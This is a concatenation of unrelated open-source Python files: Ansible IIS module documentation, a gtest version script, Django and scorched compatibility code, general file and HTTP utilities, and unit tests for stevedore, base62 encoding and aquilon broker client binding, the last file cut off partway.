lib/ansible/modules/windows/win_iis_virtualdirectory.py
|
78
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Henrik Wallström <henrik@wallstroms.nu>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_iis_virtualdirectory
version_added: "2.0"
short_description: Configures a virtual directory in IIS.
description:
- Creates, Removes and configures a virtual directory in IIS.
options:
name:
description:
- The name of the virtual directory to create or remove
required: true
state:
description:
- Whether to add or remove the specified virtual directory
choices:
- absent
- present
required: false
default: present
site:
description:
- The site name under which the virtual directory is created or exists.
required: true
application:
description:
- The application under which the virtual directory is created or exists.
required: false
default: null
physical_path:
description:
- The physical path to the folder in which the new virtual directory is created. The specified folder must already exist.
required: false
default: null
author: Henrik Wallström
'''
EXAMPLES = r'''
- name: Create a virtual directory if it does not exist
win_iis_virtualdirectory:
name: somedirectory
site: somesite
state: present
physical_path: c:\virtualdirectory\some
- name: Remove a virtual directory if it exists
win_iis_virtualdirectory:
name: somedirectory
site: somesite
state: absent
- name: Create a virtual directory on an application if it does not exist
win_iis_virtualdirectory:
name: somedirectory
site: somesite
application: someapp
state: present
physical_path: c:\virtualdirectory\some
'''
|
andybarry/flight
|
refs/heads/master
|
externals/gtest/xcode/Scripts/versiongenerate.py
|
3088
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A script to prepare version informtion for use the gtest Info.plist file.
This script extracts the version information from the configure.ac file and
uses it to generate a header file containing the same information. The
#defines in this header file will be included in during the generation of
the Info.plist of the framework, giving the correct value to the version
shown in the Finder.
This script makes the following assumptions (these are faults of the script,
not problems with the Autoconf):
1. The AC_INIT macro will be contained within the first 1024 characters
of configure.ac
2. The version string will be 3 integers separated by periods and will be
surrounded by squre brackets, "[" and "]" (e.g. [1.0.1]). The first
segment represents the major version, the second represents the minor
version and the third represents the fix version.
3. No ")" character exists between the opening "(" and closing ")" of
AC_INIT, including in comments and character strings.
"""
import sys
import re
# NOTE: Python 2 script (uses print statements).
# Read the command line argument (the output directory for Version.h)
if (len(sys.argv) < 3):
  print "Usage: versiongenerate.py input_dir output_dir"
  sys.exit(1)
else:
  input_dir = sys.argv[1]
  output_dir = sys.argv[2]

# Read the first 1024 characters of the configure.ac file
config_file = open("%s/configure.ac" % input_dir, 'r')
buffer_size = 1024
opening_string = config_file.read(buffer_size)
config_file.close()

# Extract the version string from the AC_INIT macro
# The following init_expression means:
#   Extract three integers separated by periods and surrounded by squre
#   brackets(e.g. "[1.0.1]") between "AC_INIT(" and ")". Do not be greedy
#   (*? is the non-greedy flag) since that would pull in everything between
#   the first "(" and the last ")" in the file.
version_expression = re.compile(r"AC_INIT\(.*?\[(\d+)\.(\d+)\.(\d+)\].*?\)",
                                re.DOTALL)
version_values = version_expression.search(opening_string)
# NOTE(review): .search() returning None (no AC_INIT match) would raise
# AttributeError on the next line.
major_version = version_values.group(1)
minor_version = version_values.group(2)
fix_version = version_values.group(3)

# Write the version information to a header file to be included in the
# Info.plist file.
file_data = """//
// DO NOT MODIFY THIS FILE (but you can delete it)
//
// This file is autogenerated by the versiongenerate.py script. This script
// is executed in a "Run Script" build phase when creating gtest.framework. This
// header file is not used during compilation of C-source. Rather, it simply
// defines some version strings for substitution in the Info.plist. Because of
// this, we are not not restricted to C-syntax nor are we using include guards.
//
#define GTEST_VERSIONINFO_SHORT %s.%s
#define GTEST_VERSIONINFO_LONG %s.%s.%s
""" % (major_version, minor_version, major_version, minor_version, fix_version)
version_file = open("%s/Version.h" % output_dir, 'w')
version_file.write(file_data)
version_file.close()
|
shadyueh/pyranking
|
refs/heads/master
|
env/lib/python2.7/site-packages/django/contrib/gis/db/backends/spatialite/features.py
|
326
|
from django.contrib.gis.db.backends.base.features import BaseSpatialFeatures
from django.contrib.gis.geos import geos_version_info
from django.db.backends.sqlite3.features import \
DatabaseFeatures as SQLiteDatabaseFeatures
from django.utils.functional import cached_property
class DatabaseFeatures(BaseSpatialFeatures, SQLiteDatabaseFeatures):
    """Feature flags for the SpatiaLite spatial backend."""
    supports_distance_geodetic = False
    # SpatiaLite can only count vertices in LineStrings
    supports_num_points_poly = False

    @cached_property
    def supports_initspatialmetadata_in_one_transaction(self):
        # SpatiaLite 4.1+ support initializing all metadata in one transaction
        # which can result in a significant performance improvement when
        # creating the database.
        return self.connection.ops.spatial_version >= (4, 1, 0)

    @cached_property
    def supports_3d_storage(self):
        # NOTE(review): lexicographic string comparison ('3.10' < '3.3');
        # adequate for the GEOS 3.x versions in play here, but fragile.
        return geos_version_info()['version'] >= '3.3'
|
djangsters/scorched
|
refs/heads/master
|
scorched/compat.py
|
3
|
import sys

# Interpreter flags used to select the import paths and builtin aliases below.
_ver = sys.version_info
is_py2 = (_ver[0] == 2)
is_py3 = (_ver[0] == 3)

if is_py2:  # pragma: no cover
    from urllib import (quote, unquote, quote_plus, unquote_plus, urlencode,
                        getproxies, proxy_bypass)
    from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag
    from urllib2 import parse_http_list
    import cookielib
    from Cookie import Morsel
    from StringIO import StringIO
    from httplib import IncompleteRead

    # Unified names: on py2, `str` means unicode text and `bytes` means str.
    builtin_str = str
    bytes = str
    str = unicode
    basestring = basestring
    numeric_types = (int, long, float)

elif is_py3:  # pragma: no cover
    from urllib.parse import (urlparse, urlunparse, urljoin, urlsplit,
                              urlencode, quote, unquote, quote_plus,
                              unquote_plus, urldefrag)
    from urllib.request import parse_http_list, getproxies, proxy_bypass
    from http import cookiejar as cookielib
    from http.cookies import Morsel
    from io import StringIO
    from http.client import IncompleteRead

    builtin_str = str
    str = str
    bytes = bytes
    basestring = (str, bytes)
    numeric_types = (int, float)
def python_2_unicode_compatible(cls):
    """
    A decorator that defines __unicode__ and __str__ methods under Python
    2. Under Python 3 it does nothing.

    To support Python 2 and 3 with a single code base, define a __str__
    method returning unicode text and apply this decorator to the class.
    The implementation comes from django.utils.encoding.
    """
    if is_py3:  # pragma: no cover
        return cls
    # Python 2: the class's __str__ (written to return unicode) becomes
    # __unicode__, and __str__ is redefined to return UTF-8 bytes.
    cls.__unicode__ = cls.__str__
    cls.__str__ = lambda self: self.__unicode__().encode('utf-8')
    return cls
|
KevinBacas/DjangoRESTHello
|
refs/heads/master
|
tutorial/tutorial/__init__.py
|
12133432
| |
johnlee175/LogcatFileReader
|
refs/heads/master
|
examples/simple_utils.py
|
1
|
#!/usr/bin/env python
import urllib
import urllib2
import re
import os
import sys
import time
# upload('http://www.mywebsite.com:8080/upload.php', {}, 'file', os.path.join('/home/john/', 'a.txt'))
def upload(http_url, form_params, file_item_name, file_path):
    """POST *file_path* plus *form_params* to *http_url* as multipart/form-data.

    :param http_url: URL of the upload endpoint
    :param form_params: dict of additional form fields to send
    :param file_item_name: form field name used for the file part
    :param file_path: local path of the file to upload
    """
    # Millisecond timestamp keeps the boundary effectively unique per call.
    boundary = '-----------------%s' % hex(int(time.time() * 1000))
    crlf = '\r\n'
    separator = '--%s' % boundary
    file_type = 'application/octet-stream'
    data = []
    # One part per ordinary form field.
    for key in form_params.keys():
        value = form_params[key]
        data.append(separator)
        data.append('Content-Disposition: form-data; name="%s"%s' % (key, crlf))
        data.append(value)
    # Then the file part itself.
    data.append(separator)
    data.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (file_item_name, os.path.basename(file_path)))
    data.append('Content-Type: %s%s' % (file_type, crlf))
    # NOTE(review): the file is opened in text mode; binary payloads would
    # need 'rb'. On Python 2 (str == bytes) this mostly works on POSIX —
    # confirm the intended payload type.
    file_res = open(file_path)
    data.append(file_res.read())
    file_res.close()
    data.append('%s--%s' % (separator, crlf))
    # Parts are glued together with CRLF, as required by multipart encoding.
    http_body = crlf.join(data)
    req = urllib2.Request(http_url, data=http_body)
    req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)
    req.add_header('Connection', 'Keep-Alive')
    resp = urllib2.urlopen(req, timeout=30)
    print resp.read()
# unzip('/home/john/a.zip', '/home/john/', True)
def unzip(zip_path, extract_dir, delete_zip_on_extracted):
    """Extract *zip_path* into *extract_dir*, preserving Unix file modes.

    :param zip_path: path of the .zip archive
    :param extract_dir: directory to extract into (subdirs created as needed)
    :param delete_zip_on_extracted: when true, remove the archive afterwards
    """
    import zipfile
    # comment following code is because of the unix file permissions lost
    # zip_files = zipfile.ZipFile(zip_path, 'r')
    # zip_files.extractall(extract_dir)
    # zip_files.close()
    if not zipfile.is_zipfile(zip_path):
        print "%s is not a zip file" % zip_path
        exit(0)
    z = zipfile.ZipFile(zip_path)
    try:
        for info in z.infolist():
            name = info.filename
            # Skip entries that could escape extract_dir (zip-slip guard).
            if '..' in name:
                continue
            if name.startswith('/'):
                name = name[1:]
            target = os.path.join(extract_dir, *name.split('/'))
            if not target:
                continue
            if name.endswith('/'):  # directory
                dirname = os.path.dirname(target)
                if not os.path.isdir(dirname):
                    os.makedirs(dirname)
            else:  # file
                dirname = os.path.dirname(target)
                if not os.path.isdir(dirname):
                    os.makedirs(dirname)
                data = z.read(info.filename)
                f = open(target, 'wb')
                try:
                    f.write(data)
                finally:
                    f.close()
                del data
                # High 16 bits of external_attr hold the Unix mode bits;
                # re-apply them since extractall() would drop permissions.
                unix_attributes = info.external_attr >> 16
                if unix_attributes:
                    os.chmod(target, unix_attributes)
    finally:
        z.close()
    if delete_zip_on_extracted:
        os.remove(zip_path)
# 20161201120909
def get_curr_date_str():
    """Current local time as a 14-digit timestamp, e.g. '20161201120909'."""
    # strftime() without an explicit struct_time uses localtime(), which is
    # exactly what the explicit time.localtime(time.time()) spelled out.
    return time.strftime('%Y%m%d%H%M%S')
# 20161201120909
def is_valid_date_str(date_str):
    """Return True when *date_str* parses as %Y%m%d%H%M%S (e.g. 20161201120909).

    Invalid strings are reported on stdout and yield False.
    """
    try:
        time.strptime(date_str, '%Y%m%d%H%M%S')
        return True
    except ValueError as e:
        # 'except ... as' works on Python 2.6+ AND 3; the original comma form
        # ('except ValueError, e') is a syntax error on Python 3. print(e)
        # is likewise valid in both.
        print(e)
        return False
def remove_dir(top_dir):
    """Recursively delete *top_dir* and everything below it; no-op if absent."""
    if not os.path.exists(top_dir):
        return
    # Bottom-up walk: children are removed before their parents.
    for parent, child_dirs, child_files in os.walk(top_dir, topdown=False):
        for entry in child_files:
            os.remove(os.path.join(parent, entry))
        for entry in child_dirs:
            os.rmdir(os.path.join(parent, entry))
    # The walk never removes the root itself, so do it last.
    os.rmdir(top_dir)
def delete_file(src):
    """Delete *src*: a plain file directly, a directory recursively.

    Paths that are neither (or do not exist) are silently ignored.
    """
    if os.path.isdir(src):
        for child in os.listdir(src):
            delete_file(os.path.join(src, child))
        os.rmdir(src)
    elif os.path.isfile(src):
        os.remove(src)
# # logcat.dump.20160503082219.log
# pattern = re.compile(r'^logcat\.dump\.(\d\d\d\d\d\d\d\d\d\d\d\d\d\d)\.log$')
# def compare_file_index(a, b):
# a_num = int(pattern.match(a).group(1))
# b_num = int(pattern.match(b).group(1))
# if a_num > b_num:
# return 1
# elif a_num < b_num:
# return -1
# else:
# return 0
# merge_files('./logs/', pattern, compare_file_index)
def merge_files(folder, pattern, compare_file_index):
    """Concatenate every file in *folder* whose name matches *pattern*.

    Files are ordered with *compare_file_index* (an old-style cmp function
    taking two file names); each later file is appended to the first one and
    then deleted.

    :param folder: directory scanned (recursively) for matching files
    :param pattern: compiled regex applied to bare file names
    :param compare_file_index: cmp-style ordering function (returns <0/0/>0)
    :returns: path of the surviving, merged file
    """
    from functools import cmp_to_key  # local import: module import block untouched
    print('merge all files ...')
    file_list = []
    for parent, dir_names, file_names in os.walk(folder):
        for file_name in file_names:
            if pattern.match(file_name):
                file_list.append(file_name)
    # list.sort(cmp=...) is Python-2-only; cmp_to_key preserves the same
    # caller-supplied ordering contract and also works on Python 3.
    file_list.sort(key=cmp_to_key(compare_file_index))
    output_path = os.path.join(folder, file_list[0])
    output_fd = open(output_path, mode='a')
    try:
        for log_file in file_list[1:]:
            log_path = os.path.join(folder, log_file)
            input_fd = open(log_path)
            try:
                output_fd.write(input_fd.read())
                output_fd.flush()
            finally:
                # Close even if the write fails, so the fd is never leaked.
                input_fd.close()
            os.remove(log_path)
    finally:
        output_fd.close()
    return output_path
def fetch_url_with_line(req_url):
    """GET *req_url* and return the response body as a list of lines.

    Lines are split with splitlines(), so line terminators are stripped.
    """
    request = urllib2.Request(req_url)
    resp = urllib2.urlopen(request, timeout=30)
    return resp.read().splitlines()
# download(['http://www.mywebsite.com:8080/download.php?file=a.zip'], './zips/', ['a.zip'])
def download(urls, folder, file_names):
    """Download every URL in *urls* into *folder* under the matching name.

    :param urls: list of URLs to fetch
    :param folder: destination directory (created if missing)
    :param file_names: parallel list of target names, one per URL
    """
    if not os.path.exists(folder):
        os.makedirs(folder)
    for idx, url in enumerate(urls):
        print 'downloading ' + url
        file_path = os.path.join(folder, file_names[idx])
        urllib.urlretrieve(url, file_path)
# def flat_map_each_file(file_name, file_path, file_ext):
# print 'file path is ' + file_path + ", including file name: " \
# + file_name + ", " + file_ext + " is filename extension"
# iter_files('/home/john/logs/', flat_map_each_file)
def iter_files(top_folder, flat_map_each_file):
    """Walk *top_folder* recursively, invoking the callback on every file.

    The callback receives (file_name, full_path, extension) where the
    extension includes the leading dot (or is '' when absent).
    """
    for parent, _dirs, names in os.walk(top_folder):
        for entry in names:
            full_path = os.path.join(parent, entry)
            _base, ext = os.path.splitext(full_path)
            flat_map_each_file(entry, full_path, ext)
def platform_name():
    """Map sys.platform onto 'macosx', 'linux', 'windows', or ''.

    Uses startswith('linux') so that both the Python 2 value 'linux2' and
    the Python 3 / kernel>=3 value 'linux' are recognised (the original
    exact match on 'linux2' missed the latter).
    """
    if sys.platform == 'darwin':
        return 'macosx'
    elif sys.platform.startswith('linux'):
        return 'linux'
    elif sys.platform.find('win') >= 0:
        # Checked after 'darwin', which also contains the substring 'win'.
        return 'windows'
    else:
        return ''
def binary(name):
    """Return how to invoke executable *name* on the current OS family."""
    if os.name == 'nt':
        return name + '.exe'
    if os.name == 'posix':
        return './' + name
    return name
|
bdoner/SickRage
|
refs/heads/master
|
lib/stevedore/tests/test_test_manager.py
|
55
|
from mock import Mock, sentinel
from stevedore import (ExtensionManager, NamedExtensionManager, HookManager,
DriverManager, EnabledExtensionManager)
from stevedore.dispatch import (DispatchExtensionManager,
NameDispatchExtensionManager)
from stevedore.extension import Extension
from stevedore.tests import utils
# Shared fixtures: two bare extensions for list/iteration tests and one
# fully-populated driver extension for the DriverManager tests.
test_extension = Extension('test_extension', None, None, None)
test_extension2 = Extension('another_one', None, None, None)
mock_entry_point = Mock(module_name='test.extension', attrs=['obj'])
a_driver = Extension('test_driver', mock_entry_point, sentinel.driver_plugin,
                     sentinel.driver_obj)
# base ExtensionManager
class TestTestManager(utils.TestCase):
    """Exercises make_test_instance() for every stevedore manager flavour.

    make_test_instance() builds a manager from pre-made Extension objects
    instead of scanning entry points, which every test here relies on.
    """
    def test_instance_should_use_supplied_extensions(self):
        extensions = [test_extension, test_extension2]
        em = ExtensionManager.make_test_instance(extensions)
        self.assertEqual(extensions, em.extensions)
    def test_instance_should_have_default_namespace(self):
        em = ExtensionManager.make_test_instance([])
        self.assertEqual(em.namespace, 'TESTING')
    def test_instance_should_use_supplied_namespace(self):
        namespace = 'testing.1.2.3'
        em = ExtensionManager.make_test_instance([], namespace=namespace)
        self.assertEqual(namespace, em.namespace)
    def test_extension_name_should_be_listed(self):
        em = ExtensionManager.make_test_instance([test_extension])
        self.assertIn(test_extension.name, em.names())
    def test_iterator_should_yield_extension(self):
        em = ExtensionManager.make_test_instance([test_extension])
        self.assertEqual(test_extension, next(iter(em)))
    def test_manager_should_allow_name_access(self):
        em = ExtensionManager.make_test_instance([test_extension])
        self.assertEqual(test_extension, em[test_extension.name])
    def test_manager_should_call(self):
        em = ExtensionManager.make_test_instance([test_extension])
        func = Mock()
        em.map(func)
        func.assert_called_once_with(test_extension)
    def test_manager_should_call_all(self):
        em = ExtensionManager.make_test_instance([test_extension2,
                                                  test_extension])
        func = Mock()
        em.map(func)
        func.assert_any_call(test_extension2)
        func.assert_any_call(test_extension)
    def test_manager_return_values(self):
        def mapped(ext, *args, **kwds):
            return ext.name
        em = ExtensionManager.make_test_instance([test_extension2,
                                                  test_extension])
        results = em.map(mapped)
        self.assertEqual(sorted(results), ['another_one', 'test_extension'])
    def test_manager_should_eat_exceptions(self):
        # Default behaviour: a failing extension is dropped from the results
        # instead of raising.
        em = ExtensionManager.make_test_instance([test_extension])
        func = Mock(side_effect=RuntimeError('hard coded error'))
        results = em.map(func, 1, 2, a='A', b='B')
        self.assertEqual(results, [])
    def test_manager_should_propagate_exceptions(self):
        em = ExtensionManager.make_test_instance([test_extension],
                                                 propagate_map_exceptions=True)
        # NOTE(review): the skip below makes the rest of this test
        # unreachable, so exception propagation is currently never verified —
        # confirm the skip is still wanted.
        self.skipTest('Skipping temporarily')
        func = Mock(side_effect=RuntimeError('hard coded error'))
        em.map(func, 1, 2, a='A', b='B')
    # NamedExtensionManager
    def test_named_manager_should_use_supplied_extensions(self):
        extensions = [test_extension, test_extension2]
        em = NamedExtensionManager.make_test_instance(extensions)
        self.assertEqual(extensions, em.extensions)
    def test_named_manager_should_have_default_namespace(self):
        em = NamedExtensionManager.make_test_instance([])
        self.assertEqual(em.namespace, 'TESTING')
    def test_named_manager_should_use_supplied_namespace(self):
        namespace = 'testing.1.2.3'
        em = NamedExtensionManager.make_test_instance([], namespace=namespace)
        self.assertEqual(namespace, em.namespace)
    def test_named_manager_should_populate_names(self):
        extensions = [test_extension, test_extension2]
        em = NamedExtensionManager.make_test_instance(extensions)
        self.assertEqual(em.names(), ['test_extension', 'another_one'])
    # HookManager
    def test_hook_manager_should_use_supplied_extensions(self):
        extensions = [test_extension, test_extension2]
        em = HookManager.make_test_instance(extensions)
        self.assertEqual(extensions, em.extensions)
    def test_hook_manager_should_be_first_extension_name(self):
        extensions = [test_extension, test_extension2]
        em = HookManager.make_test_instance(extensions)
        # This will raise KeyError if the names don't match
        assert(em[test_extension.name])
    def test_hook_manager_should_have_default_namespace(self):
        em = HookManager.make_test_instance([test_extension])
        self.assertEqual(em.namespace, 'TESTING')
    def test_hook_manager_should_use_supplied_namespace(self):
        namespace = 'testing.1.2.3'
        em = HookManager.make_test_instance([test_extension],
                                            namespace=namespace)
        self.assertEqual(namespace, em.namespace)
    def test_hook_manager_should_return_named_extensions(self):
        # Hooks share a name; lookup returns every extension under that name.
        hook1 = Extension('captain', None, None, None)
        hook2 = Extension('captain', None, None, None)
        em = HookManager.make_test_instance([hook1, hook2])
        self.assertEqual([hook1, hook2], em['captain'])
    # DriverManager
    def test_driver_manager_should_use_supplied_extension(self):
        em = DriverManager.make_test_instance(a_driver)
        self.assertEqual([a_driver], em.extensions)
    def test_driver_manager_should_have_default_namespace(self):
        em = DriverManager.make_test_instance(a_driver)
        self.assertEqual(em.namespace, 'TESTING')
    def test_driver_manager_should_use_supplied_namespace(self):
        namespace = 'testing.1.2.3'
        em = DriverManager.make_test_instance(a_driver, namespace=namespace)
        self.assertEqual(namespace, em.namespace)
    def test_instance_should_use_driver_name(self):
        em = DriverManager.make_test_instance(a_driver)
        self.assertEqual(['test_driver'], em.names())
    def test_instance_call(self):
        def invoke(ext, *args, **kwds):
            return ext.name, args, kwds
        em = DriverManager.make_test_instance(a_driver)
        result = em(invoke, 'a', b='C')
        self.assertEqual(result, ('test_driver', ('a',), {'b': 'C'}))
    def test_instance_driver_property(self):
        em = DriverManager.make_test_instance(a_driver)
        self.assertEqual(sentinel.driver_obj, em.driver)
    # EnabledExtensionManager
    def test_enabled_instance_should_use_supplied_extensions(self):
        extensions = [test_extension, test_extension2]
        em = EnabledExtensionManager.make_test_instance(extensions)
        self.assertEqual(extensions, em.extensions)
    # DispatchExtensionManager
    def test_dispatch_instance_should_use_supplied_extensions(self):
        extensions = [test_extension, test_extension2]
        em = DispatchExtensionManager.make_test_instance(extensions)
        self.assertEqual(extensions, em.extensions)
    def test_dispatch_map_should_invoke_filter_for_extensions(self):
        em = DispatchExtensionManager.make_test_instance([test_extension,
                                                          test_extension2])
        filter_func = Mock(return_value=False)
        args = ('A',)
        kw = {'big': 'Cheese'}
        em.map(filter_func, None, *args, **kw)
        filter_func.assert_any_call(test_extension, *args, **kw)
        filter_func.assert_any_call(test_extension2, *args, **kw)
    # NameDispatchExtensionManager
    def test_name_dispatch_instance_should_use_supplied_extensions(self):
        extensions = [test_extension, test_extension2]
        em = NameDispatchExtensionManager.make_test_instance(extensions)
        self.assertEqual(extensions, em.extensions)
    def test_name_dispatch_instance_should_build_extension_name_map(self):
        extensions = [test_extension, test_extension2]
        em = NameDispatchExtensionManager.make_test_instance(extensions)
        self.assertEqual(test_extension, em.by_name[test_extension.name])
        self.assertEqual(test_extension2, em.by_name[test_extension2.name])
    def test_named_dispatch_map_should_invoke_filter_for_extensions(self):
        em = NameDispatchExtensionManager.make_test_instance([test_extension,
                                                              test_extension2])
        func = Mock()
        args = ('A',)
        kw = {'BIGGER': 'Cheese'}
        em.map(['test_extension'], func, *args, **kw)
        func.assert_called_once_with(test_extension, *args, **kw)
|
gsb-eng/tahoe-lafs
|
refs/heads/master
|
src/allmydata/test/test_base62.py
|
9
|
import random, unittest
from allmydata.util import base62, mathutil
def insecurerandstr(n):
    """Return a string of *n* pseudo-random byte values (NOT crypto-secure)."""
    return ''.join(chr(random.randrange(256)) for _ in range(n))
class T(unittest.TestCase):
    """Round-trip (encode/decode) and size-accounting tests for base62."""
    def _test_num_octets_that_encode_to_this_many_chars(self, chars, octets):
        # Helper: the codec must report exactly *octets* for *chars* characters.
        assert base62.num_octets_that_encode_to_this_many_chars(chars) == octets, "%s != %s <- %s" % (octets, base62.num_octets_that_encode_to_this_many_chars(chars), chars)
    def _test_ende(self, bs):
        # Helper: encoding then decoding must reproduce the original bytes.
        # repr() replaces the Python-2-only backtick syntax (same output on 2.x).
        ascii=base62.b2a(bs)
        bs2=base62.a2b(ascii)
        assert bs2 == bs, "bs2: %s:%s, bs: %s:%s, ascii: %s:%s" % (len(bs2), repr(bs2), len(bs), repr(bs), len(ascii), repr(ascii))
    def test_num_octets_that_encode_to_this_many_chars(self):
        # BUG FIX: the original 'return'ed after the first call, so the
        # remaining three size cases were never exercised.
        self._test_num_octets_that_encode_to_this_many_chars(2, 1)
        self._test_num_octets_that_encode_to_this_many_chars(3, 2)
        self._test_num_octets_that_encode_to_this_many_chars(5, 3)
        self._test_num_octets_that_encode_to_this_many_chars(6, 4)
    def test_ende_0x00(self):
        return self._test_ende('\x00')
    def test_ende_0x01(self):
        return self._test_ende('\x01')
    def test_ende_0x0100(self):
        return self._test_ende('\x01\x00')
    def test_ende_0x000000(self):
        return self._test_ende('\x00\x00\x00')
    def test_ende_0x010000(self):
        return self._test_ende('\x01\x00\x00')
    def test_ende_randstr(self):
        return self._test_ende(insecurerandstr(2**4))
    def test_ende_longrandstr(self):
        return self._test_ende(insecurerandstr(random.randrange(0, 2**10)))
    def test_odd_sizes(self):
        # Round-trip random bit lengths that are not multiples of 8.
        for j in range(2**6):
            lib = random.randrange(1, 2**8)
            numos = mathutil.div_ceil(lib, 8)
            bs = insecurerandstr(numos)
            # zero-out unused least-sig bits
            if lib%8:
                b=ord(bs[-1])
                b = b >> (8 - (lib%8))
                b = b << (8 - (lib%8))
                bs = bs[:-1] + chr(b)
            asl = base62.b2a_l(bs, lib)
            assert len(asl) == base62.num_chars_that_this_many_octets_encode_to(numos) # the size of the base-62 encoding must be just right
            bs2l = base62.a2b_l(asl, lib)
            assert len(bs2l) == numos # the size of the result must be just right
            assert bs == bs2l
def suite():
    """Build a TestSuite containing every test* method of T."""
    # NOTE(review): unittest.makeSuite is deprecated (removed in Python 3.13);
    # unittest.defaultTestLoader.loadTestsFromTestCase(T) is the modern form.
    suite = unittest.makeSuite(T, 'test')
    return suite

if __name__ == "__main__":
    unittest.main()
|
jrha/aquilon
|
refs/heads/master
|
tests/broker/test_bind_client.py
|
2
|
#!/usr/bin/env python2.6
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the bind client command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
class TestBindClient(TestBrokerCommand):
    """Testing manually binding client to services.
    Once a client has been bound, you can't use it to test
    the auto-selection logic in make_aquilon.  Those tests
    are done exclusively with the chooser* services, which
    should not be used here.
    """
    # Each test*bind* method issues a broker "bind client" command and checks
    # stderr; the matching testverify* method re-reads the host to confirm
    # the service template was attached.
    def testbindafs(self):
        command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
                   "--service", "afs", "--instance", "q.ny.ms.com"]
        (out, err) = self.successtest(command)
        self.matchoutput(err,
                         "unittest02.one-nyp.ms.com adding binding for "
                         "service afs instance q.ny.ms.com",
                         command)
    def testverifybindafs(self):
        command = "show host --hostname unittest02.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
        self.matchoutput(out, "Template: service/afs/q.ny.ms.com", command)
    def testverifycatafs(self):
        command = ["cat", "--service", "afs", "--instance", "q.ny.ms.com",
                   "--server"]
        out = self.commandtest(command)
        self.searchoutput(out,
                          r'"clients" = list\(\s*"unittest02.one-nyp.ms.com"\s*\);',
                          command)
    def testbinddns(self):
        command = ["bind", "client", "--hostname", "unittest02.one-nyp.ms.com",
                   "--service", "dns", "--instance", "utdnsinstance"]
        (out, err) = self.successtest(command)
        self.matchoutput(err,
                         "unittest02.one-nyp.ms.com adding binding for "
                         "service dns instance utdnsinstance",
                         command)
    def testbindutsi1(self):
        command = ["bind", "client", "--hostname", "unittest00.one-nyp.ms.com",
                   "--service", "utsvc", "--instance", "utsi1"]
        (out, err) = self.successtest(command)
        self.matchoutput(err,
                         "unittest00.one-nyp.ms.com adding binding for "
                         "service utsvc instance utsi1",
                         command)
    def testverifybindutsi1(self):
        command = "show host --hostname unittest00.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
        self.matchoutput(out, "Template: service/utsvc/utsi1", command)
    # FIXME: the broker does not populate the client list for performance
    # reasons
    #def testverifybindutsi1proto(self):
    #    command = "show service --service utsvc --instance utsi1 --format proto"
    #    out = self.commandtest(command.split(" "))
    #    msg = self.parse_service_msg(out, 1)
    #    svc = msg.services[0]
    #    self.failUnlessEqual(svc.name, "utsvc",
    #                         "Service name mismatch: %s instead of utsvc\n" %
    #                         svc.name)
    #    si = svc.serviceinstances[0]
    #    self.failUnlessEqual(si.name, "utsi1",
    #                         "Service name mismatch: %s instead of utsi1\n" %
    #                         si.name)
    #    clients = [host.fqdn for host in si.clients]
    #    self.failUnlessEqual(clients, ["unittest00.one-nyp.ms.com"],
    #                         "Wrong list of clients for service utsvc "
    #                         "instance utsi1: %s\n" %
    #                         " ".join(clients))
    def testbindutsi2(self):
        command = ["bind", "client", "--debug",
                   "--hostname", "unittest02.one-nyp.ms.com",
                   "--service", "utsvc", "--instance", "utsi2"]
        (out, err) = self.successtest(command)
        self.matchoutput(err, "Creating service Chooser", command)
    def testverifybindutsi2(self):
        command = "show host --hostname unittest02.one-nyp.ms.com"
        out = self.commandtest(command.split(" "))
